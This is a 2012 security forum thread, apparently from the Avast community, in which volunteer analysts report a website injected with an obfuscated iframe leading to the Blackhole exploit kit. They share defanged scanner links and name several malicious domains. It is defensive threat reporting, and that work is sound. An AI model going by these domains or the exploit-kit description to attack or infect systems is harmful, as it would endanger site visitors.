Author Topic: Blackhole iFrame still responsive on site as avast Networkshield detects!  (Read 3058 times)

0 Members and 1 Guest are viewing this topic.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34047
  • malware fighter
See: htxp://urlquery.net/report.php?id=57244
See: htxp://sitecheck.sucuri.net/results/usalii.com/
Get URL:Mal with Networkshield for the iFrame url: bxwtlawdpz.proxydns dot com
Avast keeps us protected,

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2219
    • The WAR Against Malware
The injected iframe's coding is heavily obfuscated (and will not load with some html viewers) and decodes to your generic blackhole exploit kit. Like most, this one also checks for plugin versions to figure out which exploit(s) to use.
Familiarize Yourself! | Educate Yourself! | Beautify Yourself! | Scan Yourself!
"People who say it cannot be done should not interrupt those who are doing it."

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34047
  • malware fighter
Hi !Donovan,

Here we see another example as how IDS flags this: htxp://urlquery.net/report.php?id=52339 & htxp://zulu.zscaler.com/submission/show/960d8242bd962bcdcbd5cf2046e1716a-1337442693
Site has an outdated vBulletin version....
htxp://sitecheck.sucuri.net/results/www.ebikeforum.com/  with 9 instances of malware found,
also see Zscaler's external objects scan,
blocked by Google's safebrowsing: htxp://google.com/safebrowsing/diagnostic?site=ebikeforum.com/
with this as original infecting site: htxp://www.checksitesafe.com/site/directmarketinglead-trade.in/  with a red 5/100 score

polonus
« Last Edit: May 19, 2012, 06:29:57 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline Left123

  • There Is No Patch For Human Stupidity.
  • Avast Evangelist
  • Advanced Poster
  • ***
  • Posts: 1048
  • Proud Community Member&Helper.
I'am here to confirm it.The source code was heavily obfuscated,malzila did its job though  ;D .

Site is detected: http://urlvoid.com/scan/yrdvjt.fartit.com/ .
AMD Athlon(tm) X2 Dual-Core Processor 4200+ - 2.20 GHz,3,00 GB RAM -
Browser:Mozilla Firefox +WOT - SoftWare:CCleaner - Windows 7 32 bit
No Anti-Virus

Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2219
    • The WAR Against Malware
Hi Polonus,

2 different exploit algorithms and 2 different malicious websites. The site needs to remove the scripts, change their passwords, and step up their security.


----

CheckSiteSafe looks and has fetures related to Webutation? ???
Familiarize Yourself! | Educate Yourself! | Beautify Yourself! | Scan Yourself!
"People who say it cannot be done should not interrupt those who are doing it."

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34047
  • malware fighter
Hi Left123 & !Donovan,

I really like to thank you guys for digging into this, both of you.
A further thanks to all that commit here in these threads,
we are growing into an important knowledge base
how to perform pre-url-scanning to aid avast detection,

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!